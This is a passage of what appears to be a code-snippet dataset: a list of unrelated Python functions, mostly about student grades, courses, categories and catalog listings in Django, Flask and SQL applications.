Colors.NORMAL + accomplishment)", "def Subcategories():\n subcat = {\n \t\"Featured\": 0,\n \t\"All\": 1,\n \t\"Collectibles\": 2,\n \t\"Clothing\": 3,\n \t\"BodyParts\": 4,\n \t\"Gear\": 5,\n \t\"Models\": 6,\n \t\"Plugins\": 7,\n \t\"Decals\": 8,\n \t\"Hats\": 9,\n \t\"Faces\": 10,\n \t\"Packages\": 11,\n \t\"Shirts\": 12,\n \t\"Tshirts\": 13,\n \t\"Pants\": 14,\n \t\"Heads\": 15,\n \t\"Audio\": 16,\n \t\"RobloxCreated\": 17,\n \t\"Meshes\": 18,\n \t\"Accessories\": 19,\n \t\"HairAccessories\": 20,\n \t\"FaceAccessories\": 21,\n \t\"NeckAccessories\": 22,\n \t\"ShoulderAccessories\": 23,\n \t\"FrontAccessories\": 24,\n \t\"BackAccessories\": 25,\n \t\"WaistAccessories\": 26,\n \t\"AvatarAnimations\": 27,\n \t\"ClimbAnimations\": 28,\n \t\"FallAnimations\": 30,\n \t\"IdleAnimations\": 31,\n\t \"JumpAnimations\": 32,\n\t \"RunAnimations\": 33,\n \t\"SwimAnimations\": 34,\n \t\"WalkAnimations\": 35,\n \t\"AnimationPackage\": 36,\n \t\"Bundles\": 37,\n \t\"AnimationBundles\": 38,\n\t \"EmoteAnimations\": 39,\n\t \"CommunityCreations\": 40,\n\t \"Video\": 41,\n\t \"Recommended\": 51\n }\n return subcat", "def gradeReport(course):\n report = []\n for student in course.allStudents():\n total = 0.0\n numberOfGrades = 0\n for grade in course.getGrades(student):\n total += grade\n numberOfGrades += 1\n \n try:\n average = total / numberOfGrades\n report.append(str(student) + \"'s mean grade is \" + str(average))\n except ZeroDivisionError:\n report.append(str(student) + \" has no grades\")\n \n return '\\n'.join(report)", "def get_queryset(self):\n return Objective.objects.filter(perspective__description='Learning and Capacity').order_by('code')", "def get_knowledge_category_terms(self):\n return # osid.grading.GradeQueryInspector", "def get_list(self):\n categories = []\n for attribut in self.attributes:\n attr = getattr(self, attribut, False)\n if attr is True:\n categories.append(attribut)\n if getattr(self, 'education') is True:\n categories.append(_(u'education'))\n if getattr(self, 'training') is True:\n categories.append(_(u'training'))\n if getattr(self, 'tutoring') is True:\n categories.append(_(u'tutoring'))\n\n return categories", "def graph_course(self):\n group = self.__data[\"filted_general_groupby\"]\n graph = {}\n if self.analysis[\"courses\"] is None:\n self.courses_list()\n\n # inicializa o dicionario que vai guardar o grafico\n for course in self.analysis[\"courses\"].index:\n graph[course] = []\n\n for i in range(18):\n min_v = i * 5\n max_v = min_v + 4.99\n self.__calc_graph_mean(group, min_v, max_v, graph)\n\n min_v = 95\n max_v = 100\n self.__calc_graph_mean(group, min_v, max_v, graph)\n\n self.analysis[\"graph_course\"] = graph", "def toughCategory():\n return prepJSON(cs411_dash.toughCategory())", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def get_attributes(cls, entity):\n return entity.category.facts.all()", "def get_categs_section(sect):\n return Category.objects.filter(section__section=sect)", "def get_queryset(self):\n return Initiative.objects.filter(objective__perspective__description='Capacity').order_by('objective')", "def items(self, course):\r\n pass", "def get_section_grades(self, section, section_goal=False):\n if not section_goal:\n SECTION_GRADES = \"\"\"SELECT count_ap, count_a, count_am, count_bp, count_b, count_bm, count_cp, count_c, count_cm, count_dp, count_d, count_dm, count_f,count_i, count_w FROM SectionGrades WHERE course = %s AND semester = %s AND year = %s AND section_id = %s\"\"\"\n else:\n SECTION_GRADES = \"\"\"SELECT count_ap, count_a, count_am, count_bp, count_b, count_bm, count_cp, count_c, count_cm, count_dp, count_d, count_dm, count_f FROM SectionGoalGrades WHERE course = %s AND semester = %s AND year = %s AND section_id = %s AND goal_id = %s\"\"\"\n\n ret = None\n #try:\n if not section_goal:\n self.db_cursor.execute(\n SECTION_GRADES,\n (section.course_name, section.semester, section.year, section.section_id))\n else:\n self.db_cursor.execute(\n SECTION_GRADES,\n (section.course, section.semester, section.year, section.section_id, section.goal_id))\n section_grades = self.db_cursor.fetchall()\n if len(section_grades) > 0 and not section_goal:\n ret = SectionGrades()\n ret.section_id = section.section_id\n ret.semester = section.semester\n ret.year = section.year\n ret.course = section.course_name\n ret.count_ap = section_grades[0][0]\n ret.count_a = section_grades[0][1]\n ret.count_am = section_grades[0][2]\n ret.count_bp = section_grades[0][3]\n ret.count_b = section_grades[0][4]\n ret.count_bm = section_grades[0][5]\n ret.count_cp = section_grades[0][6]\n ret.count_c = section_grades[0][7]\n ret.count_cm = section_grades[0][8]\n ret.count_dp = section_grades[0][9]\n ret.count_d = section_grades[0][10]\n ret.count_dm = section_grades[0][11]\n ret.count_f = section_grades[0][12]\n ret.count_i = section_grades[0][13]\n ret.count_w = section_grades[0][14]\n ret.course = section.course_name\n ret.semester = section.semester\n ret.year = section.year\n ret.section_id = section.section_id\n elif len(section_grades) > 0 and section_goal:\n ret = SectionGoalGrades()\n ret.section_id = section.section_id\n ret.semester = section.semester\n ret.year = section.year\n ret.course = section.course\n ret.goal_id = section.goal_id\n ret.count_ap = section_grades[0][0]\n ret.count_a = section_grades[0][1]\n ret.count_am = section_grades[0][2]\n ret.count_bp = section_grades[0][3]\n ret.count_b = section_grades[0][4]\n ret.count_bm = section_grades[0][5]\n ret.count_cp = section_grades[0][6]\n ret.count_c = section_grades[0][7]\n ret.count_cm = section_grades[0][8]\n ret.count_dp = section_grades[0][9]\n ret.count_d = section_grades[0][10]\n ret.count_dm = section_grades[0][11]\n ret.count_f = section_grades[0][12]\n else:\n ret = None\n\n #except:\n # logging.warning(\"DBAdapter: Error- cannot retrieve section grades: \" + str(id))\n\n return ret", "def test_list_grading_periods_courses(self):\r\n course_id = None # Change me!!\r\n\r\n r = self.client.list_grading_periods_courses(course_id)", "def get_categories():\n page = requests.get(BASE_URL, verify=False)\n soup = BeautifulSoup(page.content)\n output = [{'title': 'Top 10 Courses'}]\n\n for c in soup.find(id='main_aside').findAll('h4'):\n output.append({'title': c.text})\n\n return output", "def amenities(self):\n ats = storage.all(Amenity)\n ltats = []\n for objects in ats.values():\n if self.amenity_ids == objects.id:\n ltats.append(objects)\n return ltats", "def json_export(json_file,gradebook):\n \n try:\n import json\n except ImportError:\n warnings.warn('Failed to import json module. Cannot execute json_export')\n return\n if not hasattr(json_file,'write'):\n if not isinstance(json_file,basestring) or not \\\n os.path.exists(os.path.dirname(os.path.abspath(json_file))):\n raise ValueError, 'Argument \\'json_file\\' is not readable, ' \\\n 'and could not be validated as a file path.'\n else:\n json_file = open(json_file,'w+')\n \n if not isinstance(gradebook,Gradebook):\n raise TypeError, 'gradebook argument must be a Gradebook objcet.'\n \n cat_dict = dict(gradebook._Gradebook__categories)\n all_items = []\n for cat_name in cat_dict:\n gr_leest = cat_dict[cat_name].grades.select(docopy=True,aslist=True)\n for i in gr_leest:\n x = {}\n if not isinstance(i,Grade):\n continue\n x['type']='Grade'\n x['name']=i.name\n if i.parent is not None:\n if i.parent.name == cat_name or i.parent.name in cat_dict:\n x['parent'] = i.parent.name\n else:\n x['parent'] = None\n attribs = {}\n attribs['score'] = i.score\n attribs['maximum'] = i.maximum\n attribs['weight'] = i.weight\n attribs['extra_credit'] = i.extra_credit\n if i.overrides:\n attribs['overrides'] = list(i.overrides)\n for ovrrd in i.overrides:\n if not isinstance(overrd,basestring):\n attribs['overrides'].remove(overrd)\n if i.timestamp and isinstance(i.timestamp,datetime.datetime):\n tmstmp = calendar.timegm(i.timestamp.utctimetuple())\n attribs['timestamp'] = tmstmp\n if i.identifiers:\n attribs['identifiers'] = dict(i.identifiers)\n \n x['attribs'] = attribs\n all_items.append(x)\n catt = {'type':'Category','name':cat_name}\n if cat_dict[cat_name].parent is not None:\n catt['parent'] = cat_dict[cat_name].parent.name\n else:\n catt['parent'] = None\n catt['attribs'] = dict(cat_dict[cat_name]._Category__attribs)\n all_items.append(catt)\n \n grbk = {'type':'Gradebook','name':gradebook.name,'user':gradebook.user}\n all_items.append(grbk)\n enc_me = {\"grading\": all_items}\n \n encoder = json.JSONEncoder(indent=4,separators=(', ',': '))\n enc = encoder.encode(enc_me)\n \n json_file.write(enc)\n json_file.close()", "def grade_report(course):\n report = []\n for st in course.get_students():\n try:\n average = sum(course.get_grades(st)) / len(course.get_grades(st))\n report.append(str(st) + '\\'s mean grade is: ' + str(average) + '.')\n except ZeroDivisionError:\n report.append(str(st) + ' has no grades.')\n return '\\n'.join(report)", "def upcoming_courses(aud):\n \n courses = [c for c in aud.all_courses() if c.grade == u\"*\"]\n return [c.number.replace(\"-\", \"\") for c in courses]", "def get_class_grades(class_id):\n\n grades = []\n quiz_grades = query_db(\n \"SELECT people.name, quizzes.name, grade FROM quiz_grades JOIN people \"\n \"ON quiz_grades.student_id=people.id JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n [class_id],\n )\n for grade in quiz_grades:\n grade_class = {}\n grade_class[\"student_name\"] = grade[0]\n grade_class[\"thing_name\"] = str(grade[1]) + \" (Quiz)\"\n grade_class[\"grade\"] = grade[2]\n grades.append(grade_class)\n assignment_grades = query_db(\n \"SELECT people.name, assignments.name, grade FROM assignment_grades \"\n \"JOIN people ON assignment_grades.student_id=people.id \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics ON assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE classes.id=?;\",\n [class_id],\n )\n for grade in assignment_grades:\n grade_assign = {}\n grade_assign[\"student_name\"] = grade[0]\n grade_assign[\"thing_name\"] = str(grade[1]) + \" (Assignment)\"\n grade_assign[\"grade\"] = grade[2]\n grades.append(grade_assign)\n return grades", "def print_loc_acrnym():\n\n #Method2\n val = College.objects.values('acronym','contact')\n for i in val:\n print(i['acronym'],i['contact'])", "def testAC(self):\n for size in range(5):\n for attr in ('ST', 'DX'):\n a = AttributeAbility([attr,], size + 1)\n self.assertEqual(a.AC, (2000, 4000, 7000, 15000, 25000)[size])\n for attr in ('IQ', 'Dam'):\n a = AttributeAbility([attr,], size + 1)\n self.assertEqual(a.AC, (1000, 2000, 3500, 7000, 15000)[size])\n a = AttributeAbility(['MA',], size + 1)\n self.assertEqual(a.AC, (1000, 2000, 3000, 6000, 12000)[size])\n a = AttributeAbility(['Hit',], size + 1)\n self.assertEqual(a.AC, (1000, 2500, 5000, 10000, 18000)[size])", "def get_category_ratings(self):\n category_ratings = dict()\n for cat_rating in self.category_ratings.all():\n category_ratings[cat_rating.category.name] = cat_rating.rating\n return category_ratings", "def grade_over_time(g_date):\n year_df=g_date.groupby('GRADE DATE')['GRADE']\n gradeOverTime={}\n for name, group in year_df:\n gradeOverTime[name]=collections.Counter(group)\n\n gradeOverTime=pd.DataFrame(gradeOverTime)\n gradeOverTime=pd.DataFrame(gradeOverTime.values.T,columns=gradeOverTime.index,index=[2010,2011,2012,2013,2014])\n \n\n return gradeOverTime", "def get_all_by_category(self, category):\n products = self.db.query(f\"\"\"\n SELECT product.id, product.name, product.nutrition_grade\n from product\n JOIN product_category ON product_category.product_id = product.id\n JOIN category ON product_category.category_id = category.id\n WHERE category.id = :id\n \"\"\", id=category.id).all(as_dict=True)\n return [self.model(**product) for product in products]", "def print_schedule():\n clear_screen()\n print(\"====Current Schedule====\")\n days = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']\n with open('current_courses.json', 'r') as current_file:\n schedule = json.load(current_file)\n for day in days:\n for val, val2 in schedule.items():\n if day in val2[0]:\n print(day, val, str(val2[1])+'-'+str(val2[2])+\" Presumed Grade: \"+ val2[3])\n return 0", "def get_categories(race_name, event_discipline):\n # FIXME - need to handle pro/elite (cat 0) for MTB\n # FIXME - MTB categories are a disaster and probably need a completely different set of patterns\n cat_match = CATEGORY_RE.search(race_name)\n age_match = AGE_RANGE_RE.search(race_name)\n if age_match:\n return []\n elif cat_match:\n cats = cat_match.group(1).lower().replace('pro', '1')\n if cats in ['beginner', 'novice']:\n cats = '5'\n elif cats == 'c':\n cats = '4'\n elif cats == 'b':\n cats = '3'\n elif cats == 'a':\n cats = '1/2'\n elif cats == 'a/b':\n cats = '1/2/3'\n elif cats == 'b/c':\n cats = '3/4'\n return list(set(int(c) for c in cats.split('/')))\n else:\n return []", "def amenities_all():\n return jsonify(list(map(lambda x: x.to_dict(),\n list(storage.all(Amenity).values()))))", "def course_index(request, course_key):\r\n course_module = _get_course_module(course_key, request.user, depth=3)\r\n lms_link = get_lms_link_for_item(course_module.location)\r\n sections = course_module.get_children()\r\n\r\n\r\n return render_to_response('overview.html', {\r\n 'context_course': course_module,\r\n 'lms_link': lms_link,\r\n 'sections': sections,\r\n 'course_graders': json.dumps(\r\n CourseGradingModel.fetch(course_key).graders\r\n ),\r\n 'new_section_category': 'chapter',\r\n 'new_subsection_category': 'sequential',\r\n 'new_unit_category': 'vertical',\r\n 'category': 'vertical'\r\n })", "def list(self, option: str = \"\", short=False, **kwargs):\n courses = self.get_sorted_courses()\n\n if option == \"plain\":\n if short:\n for course in sorted(courses, key=lambda x: x.name + x.type):\n print(f\"{course.name} ({course.type})\")\n else:\n for course in sorted(courses, key=lambda x: x.abbreviation + x.type):\n print(f\"{course.abbreviation}-{course.type[0]}\")\n quit()\n\n current_day = datetime.today()\n current_weekday = current_day.weekday()\n\n # split to scheduled and non-scheduled\n unscheduled = [c for c in courses if c.time is None]\n courses = [c for c in courses if c not in unscheduled]\n\n table = []\n option = option.lower()\n\n for i, course in enumerate(courses):\n # lambda functions to test for various options\n # a is current weekday and b is the course's weekday\n options = {\n \"\": lambda _, __: True, # all of them\n \"t\": lambda a, b: a == b, # today\n \"tm\": lambda a, b: (a + 1) % 7 == b, # tomorrow\n \"mo\": lambda a, b: b == 0,\n \"tu\": lambda a, b: b == 1,\n \"we\": lambda a, b: b == 2,\n \"th\": lambda a, b: b == 3,\n \"fr\": lambda a, b: b == 4,\n \"sa\": lambda a, b: b == 5,\n \"su\": lambda a, b: b == 6,\n }\n\n if option not in options:\n exit_with_error(\"Invalid course-listing option!\")\n\n if options[option](current_weekday, course.weekday()):\n # include the name of the day before first day's course\n if courses[i - 1].time.day != courses[i].time.day:\n weekday = course.time.day.capitalize()\n\n # calculate the next occurrence\n date = (\n current_day\n + timedelta(days=(course.weekday() - current_weekday) % 7)\n ).strftime(\"%-d. %-m.\")\n\n table.append([f\"{weekday if not short else weekday[:3]} / {date}\"])\n\n # for possibly surrounding the name with chars if it's ongoing\n name_surround_char = \"•\" if course.is_ongoing() else \"\"\n\n row = [\n f\"{name_surround_char}{course.name if not short else course.abbreviation}{name_surround_char}\",\n f\"{minutes_to_HHMM(course.time.start)} -\"\n f\" {minutes_to_HHMM(course.time.end)}\"\n + (\n \"\"\n if course.time.weeks is None\n else (\n f\" ({course.time.weeks if not short else course.time.weeks[0]})\"\n )\n ),\n \"-\" if course.classroom is None else course.classroom.number,\n ]\n\n # color the course name the appropriate color, depending on its type\n row[0] = Ansi.color(row[0], course_types[course.type].color)\n\n # append useful information\n table.append(row)\n\n # list unscheduled courses only when no options are specified\n if option == \"\" and len(unscheduled) != 0:\n table.append([\"Unscheduled\"])\n for course in unscheduled:\n table.append(\n [\n course.name if not short else course.abbreviation,\n course.type[0],\n \"-\",\n \"-\",\n ]\n )\n\n if len(table) == 0:\n exit_with_error(\"No courses matching the criteria found!\")\n\n print_table(table)", "def showallCategories():\n category = session.query(Category).all()\n onedayearly = datetime.timedelta(hours=24)\n since = datetime.datetime.now() - onedayearly\n latest = session.query(Item).filter(Item.date > since)\n return render_template('category.html', category=category, latest=latest)", "def avg_by_category(self, start_date, end_date):\n data = self.by_date(start_date, end_date)\n\n return data.values('category__name').annotate(avg_value=models.Avg('value')).order_by('category')", "def GetEasiestDisciplines(self):\n dlist = self.DisciplineList\n glist = self.GradeList\n result = []\n for disID in dlist.IDs:\n glist.SetQueryOptions(FilterAttribute=\"DisciplineID\", FilterValue=disID, StrictFilter=False, OrderAttribute=\"ID\", Descending=False)\n if glist.Length(True) == 0:\n continue\n avg = 0\n for gID in glist.QueryIDs:\n avg += glist[gID].Value\n avg /= glist.Length(True)\n result.append((dlist[disID], float(\"%.3f\" % avg)))\n def get_tupl_avg(t):\n return t[1]\n return sorted(result, key=get_tupl_avg, reverse=True)", "def college_selectivity():", "def easyCategory():\n return prepJSON(cs411_dash.easyCategory())", "def get_category_scores(category: Category):\r\n solutions = Solution.objects.filter(challenge__category=category).select_related(\"user\").select_related(\"challenge\")\r\n d = dict()\r\n\r\n for sol in solutions:\r\n d[sol.user] = d.get(sol.user, 0) + sol.get_score()\r\n \r\n return d", "def get_achievement_category_index(self, region, namespace, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/achievement-category/index', region, **filters)", "def compute_overall_opinions(self):\r\n opinions_list = []\r\n global CATEGORIES\r\n i=0\r\n for cat in CATEGORIES:\r\n opinions_list.append([])\r\n for citizen in self.citizens:\r\n opinions_list[i].append(citizen.opinions[cat].weight)\r\n i+=1\r\n \r\n i=0;\r\n for cat in CATEGORIES:\r\n mean = stats.describe(opinions_list[i])[2]\r\n std = math.sqrt(stats.describe(opinions_list[i])[3])\r\n print \"Category: %d - Mean: %f - STD: %f\" % (cat, mean, std)\r\n i+=1", "def categories(self):\n pass", "def get_student_grade(class_id):\n grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? \"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def __getTypeListByASG( self, asg ):\r\n for (otherASG, typeList) in self.__trackASG.values():\r\n if( asg == otherASG ): \r\n return typeList\r\n return []", "def category(self) -> PracticeCategory:\n return PracticeCategory.PERFORMANCE", "def enumerate_appointments(age, gender, nb=2, price=60.):", "def show_categories():\n for category in NEWS_CATEGORIES:\n print(category)", "def get_subcat_axes():\n cursor = conn.cursor()\n cursor.execute(\n \"\"\"\n SELECT category, sub_category, function, bitmask, gene_name\n FROM genome_rules\n ORDER by category, sub_category\n \"\"\"\n )\n rows = cursor.fetchall()\n subcats = {}\n for k_cat, g_cat in groupby(rows, lambda r: r[0]):\n subcats[k_cat] = {}\n for k_subcat, g_subcat in groupby(g_cat, lambda r: r[1]):\n subcats[k_cat][k_subcat] = []\n for genes in g_subcat:\n subcats[k_cat][k_subcat].append(\n (genes[2], genes[3], genes[4])\n )\n return subcats", "def get_courses(std):\n return std[2]", "def amenity_get_all():\n am_list = []\n am_obj = storage.all(\"Amenity\")\n for obj in am_obj.values():\n am_list.append(obj.to_json())\n\n return jsonify(am_list)", "def average_grade(self):\n grade_sum = 0\n grades_length = 0\n for c in self.courses_grades:\n if c[1] != \"-\":\n grade_sum += int(c[1])\n grades_length += 1\n average = grade_sum / grades_length\n return average", "def super_categories(self):\n R = self.base().base_ring()\n category = GradedHopfAlgebrasWithBasis(R)\n return [Realizations(self.base()), category.Quotients()]", "def get_achievement_category(self, region, namespace, id, **filters):\n filters['namespace'] = namespace\n return self.get_resource('data/wow/achievement-category/{0}', region, *[id], **filters)", "def list_course(request, template=\"core/list_course.html\"):\n response = {\n 'morning': Course.objects.at_morning(),\n 'afternoon': Course.objects.at_afternoon(),\n }\n return direct_to_template(request, template, response)", "def get_antags(self):\n antags = []\n for obj in self.antagobjs.group_by(AntagObjective.mindkey):\n antag = {'key': obj.mindkey, 'name': obj.mindname, 'role': obj.special_role}\n antags.append(antag)\n return antags", "def subjectivity():\r\n scores = []\r\n for index, row in topics_data.iterrows():\r\n if index in actual_list:\r\n scores.append(row['score'])\r\n\r\n subs = []\r\n for index, row in topics_data.iterrows():\r\n if index in actual_list:\r\n url = row['url']\r\n if 'newsweek' or 'democracynow' in url:\r\n user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'\r\n config = Config()\r\n config.browser_user_agent = user_agent\r\n article = Article(url, config=config)\r\n else:\r\n article = Article(url)\r\n article.download()\r\n article.parse()\r\n article.nlp()\r\n text = article.summary\r\n obj = TextBlob(text)\r\n subjectivity = obj.sentiment.subjectivity\r\n subs.append(subjectivity)\r\n\r\n plt.figure(figsize=(50, 10))\r\n plt.scatter(subs, scores)\r\n plt.xlabel('Subjectivity')\r\n plt.ylabel('Score')\r\n plt.title('Posts in r/politics')\r\n plt.show()", "def show_info(self):\n # attr[0] attr[1]\n attrs = [(self.TYP.value, 'nam'),\n ('Skill', 'skl')]\n # voeg ook alle stats en skills in deze lijst toe.\n for stat in Minimals:\n attrs.append((stat.value, stat.name))\n attrs.append(('Spell Battery', 'cur_bat'))\n for stat in StatType:\n attrs.append((stat.value, stat.name))\n for skill in SkillType:\n attrs.append((skill.value, skill.name))\n\n # nu alle mogelijkheden geladen zijn, ga dan aan de slag met diegene die van toepassing zijn\n attr_list = []\n\n import enum\n for attr in attrs:\n value_of_attr = self.get_value_of(attr[1])\n # uitzondering, 'wht' altijd gewoon weergeven\n if attr[0] == StatType.wht.value:\n # deze uitzondering geldt niet voor weapons en shields.\n if not isinstance(self.get_value_of('skl'), enum.Enum): # niet wanneer 'skl' een waarde heeft\n attr_list.append((attr[0], str(value_of_attr)))\n elif value_of_attr:\n if isinstance(value_of_attr, enum.Enum): # uitzondering alleen voor 'skl'\n value_of_attr = value_of_attr.value\n elif attr[0] == StatType.hit.value: # uitzondering alleen voor 'hit'\n value_of_attr = str(value_of_attr)+\"%\"\n attr_list.append((attr[0], str(value_of_attr)))\n\n return attr_list", "def area_attractions(request, pk):\n try:\n area = Area.objects.get(pk=pk)\n except Area.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n attractions = Attraction.objects.filter(area__pk=pk)\n serializer = AttractionSerializer(attractions, many=True)\n return JSONResponse(serializer.data)\n\n return JSONResponse(status=403)", "def Categories():\n cat = {\n \t \"Featured\": 0,\n \t \"All\": 1,\n \t \"Collectibles\": 2,\n \t \"Clothing\": 3,\n \t \"BodyParts\": 4,\n \t \"Gear\": 5,\n \t \"Models\": 6,\n \t \"Plugins\": 7,\n\t \"Decals\": 8,\n \t \"Audio\": 9,\n \t \"Meshes\": 10,\n\t \"Accessories\": 11,\n\t \"AvatarAnimations\": 12,\n\t \"CommunityCreations\": 13,\n\t \"Video\": 14,\n\t \"Recommended\": 15\n }\n return cat", "def get_ag_access(accees_group_id):\n\n\trooms = Room.query \\\n\t\t.join(CardReader, CardReader.room_b_id == Room.id) \\\n\t\t.join(gives_access_to, gives_access_to.c.cr_id == CardReader.id) \\\n\t\t.filter_by(ag_id=accees_group_id)\n\n\tdata = {\"rooms\": [room.text_id for room in rooms]}\n\n\treturn ok(data)", "def get_category_timetable(categ_ids, start_dt, end_dt, detail_level='event', tz=utc, from_categ=None, grouped=True,\n includible=lambda item: True):\n day_start = start_dt.astimezone(utc)\n day_end = end_dt.astimezone(utc)\n dates_overlap = lambda t: (t.start_dt >= day_start) & (t.start_dt <= day_end)\n\n items = defaultdict(lambda: defaultdict(list))\n\n # first of all, query TimetableEntries/events that fall within\n # specified range of dates (and category set)\n events = _query_events(categ_ids, day_start, day_end)\n if from_categ:\n events = events.filter(Event.is_visible_in(from_categ.id))\n for eid, tt_start_dt in events:\n if tt_start_dt:\n items[eid][tt_start_dt.astimezone(tz).date()].append(tt_start_dt)\n else:\n items[eid] = None\n\n # then, retrieve detailed information about the events\n event_ids = set(items)\n query = (Event.query\n .filter(Event.id.in_(event_ids))\n .options(subqueryload(Event.person_links).joinedload(EventPersonLink.person),\n joinedload(Event.own_room).noload('owner'),\n joinedload(Event.own_venue),\n joinedload(Event.category).undefer('effective_icon_data'),\n undefer('effective_protection_mode')))\n scheduled_events = defaultdict(list)\n ongoing_events = []\n events = []\n for e in query:\n if not includible(e):\n continue\n if grouped:\n local_start_dt = e.start_dt.astimezone(tz).date()\n local_end_dt = e.end_dt.astimezone(tz).date()\n if items[e.id] is None:\n # if there is no TimetableEntry, this means the event has not timetable on that interval\n for day in iterdays(max(start_dt.date(), local_start_dt), min(end_dt.date(), local_end_dt)):\n # if the event starts on this date, we've got a time slot\n if day.date() == local_start_dt:\n scheduled_events[day.date()].append((e.start_dt, e))\n else:\n ongoing_events.append(e)\n else:\n for start_d, start_dts in items[e.id].items():\n scheduled_events[start_d].append((start_dts[0], e))\n else:\n events.append(e)\n\n # result['events'][date(...)] -> [(datetime(....), Event(...))]\n # result[event_id]['contribs'][date(...)] -> [(TimetableEntry(...), Contribution(...))]\n # result['ongoing_events'] = [Event(...)]\n if grouped:\n result = defaultdict(lambda: defaultdict(lambda: defaultdict(list)))\n else:\n result = defaultdict(lambda: defaultdict(list))\n\n result.update({\n 'events': scheduled_events if grouped else events,\n 'ongoing_events': ongoing_events\n })\n\n # according to detail level, ask for extra information from the DB\n if detail_level != 'event':\n query = _query_blocks(event_ids, dates_overlap, detail_level)\n if grouped:\n for b in query:\n start_date = b.timetable_entry.start_dt.astimezone(tz).date()\n result[b.session.event_id]['blocks'][start_date].append((b.timetable_entry, b))\n else:\n for b in query:\n result[b.session.event_id]['blocks'].append(b)\n\n if detail_level == 'contribution':\n query = (Contribution.query\n .filter(Contribution.event_id.in_(event_ids),\n dates_overlap(TimetableEntry),\n ~Contribution.is_deleted)\n .options(contains_eager(Contribution.timetable_entry),\n joinedload(Contribution.person_links))\n .join(TimetableEntry))\n if grouped:\n for c in query:\n start_date = c.timetable_entry.start_dt.astimezone(tz).date()\n result[c.event_id]['contribs'][start_date].append((c.timetable_entry, c))\n else:\n for c in query:\n result[c.event_id]['contributions'].append(c)\n\n query = (Break.query\n .filter(TimetableEntry.event_id.in_(event_ids), dates_overlap(TimetableEntry))\n .options(contains_eager(Break.timetable_entry))\n .join(TimetableEntry))\n if grouped:\n for b in query:\n start_date = b.timetable_entry.start_dt.astimezone(tz).date()\n result[b.timetable_entry.event_id]['breaks'][start_date].append((b.timetable_entry, b))\n else:\n for b in query:\n result[b.timetable_entry.event_id]['breaks'].append(b)\n return result", "def course_query(self, term, **kwargs):\n data = {\n 'course_number': kwargs.get('course_number', ''),\n 'subject': kwargs.get('subject', ''),\n 'instructor': kwargs.get('instructor', ''),\n 'course_start_eval': 'After', # todo verify vs 'at'\n 'course_start_time': kwargs.get('start', '-'), # todo parse arg into correct time\n 'course_end_eval': 'Before', # todo verify vs 'at'\n 'course_end_time': kwargs.get('end', '-'), # todo parse arg into correct time,\n 'course_level': kwargs.get('level', '-'),\n 'course_units': kwargs.get('units', '-'),\n 'course_status': 'ALL',\n 'sortBy': '',\n 'showMe': '',\n 'runMe': '1',\n 'clearMe': '1',\n 'termCode': term.code,\n 'expandFilters': ''\n }\n try:\n r = self.post(self.COURSE_SEARCH_ENDPOINT, data=data)\n results = json.loads(r.text)['Results'] # {'COLUMNS': [...], 'DATA': [[col1_data, ...], ...}\n except KeyError:\n r = self.post(self.COURSE_SEARCH_ENDPOINT, data=data)\n results = json.loads(r.text)['Results']\n\n nrml_course_responses = self._normalize_course_query_response(results)\n\n courses = [self._course_from_query_response(term, resp) for resp in nrml_course_responses]\n return courses", "def add_course_grade(self, course, grade):\n course_grade_tuple = (course, grade)\n self.courses_grades.append(course_grade_tuple)", "def dump_grading_context(course):\r\n msg = \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Course grader:\\n\"\r\n\r\n msg += '%s\\n' % course.grader.__class__\r\n graders = {}\r\n if isinstance(course.grader, xmgraders.WeightedSubsectionsGrader):\r\n msg += '\\n'\r\n msg += \"Graded sections:\\n\"\r\n for subgrader, category, weight in course.grader.sections:\r\n msg += \" subgrader=%s, type=%s, category=%s, weight=%s\\n\" % (subgrader.__class__, subgrader.type, category, weight)\r\n subgrader.index = 1\r\n graders[subgrader.type] = subgrader\r\n msg += \"-----------------------------------------------------------------------------\\n\"\r\n msg += \"Listing grading context for course %s\\n\" % course.id\r\n\r\n gcontext = course.grading_context\r\n msg += \"graded sections:\\n\"\r\n\r\n msg += '%s\\n' % gcontext['graded_sections'].keys()\r\n for (gsections, gsvals) in gcontext['graded_sections'].items():\r\n msg += \"--> Section %s:\\n\" % (gsections)\r\n for sec in gsvals:\r\n sdesc = sec['section_descriptor']\r\n grade_format = getattr(sdesc, 'grade_format', None)\r\n aname = ''\r\n if grade_format in graders:\r\n gfmt = graders[grade_format]\r\n aname = '%s %02d' % (gfmt.short_label, gfmt.index)\r\n gfmt.index += 1\r\n elif sdesc.display_name in graders:\r\n gfmt = graders[sdesc.display_name]\r\n aname = '%s' % gfmt.short_label\r\n notes = ''\r\n if getattr(sdesc, 'score_by_attempt', False):\r\n notes = ', score by attempt!'\r\n msg += \" %s (grade_format=%s, Assignment=%s%s)\\n\" % (s.display_name, grade_format, aname, notes)\r\n msg += \"all 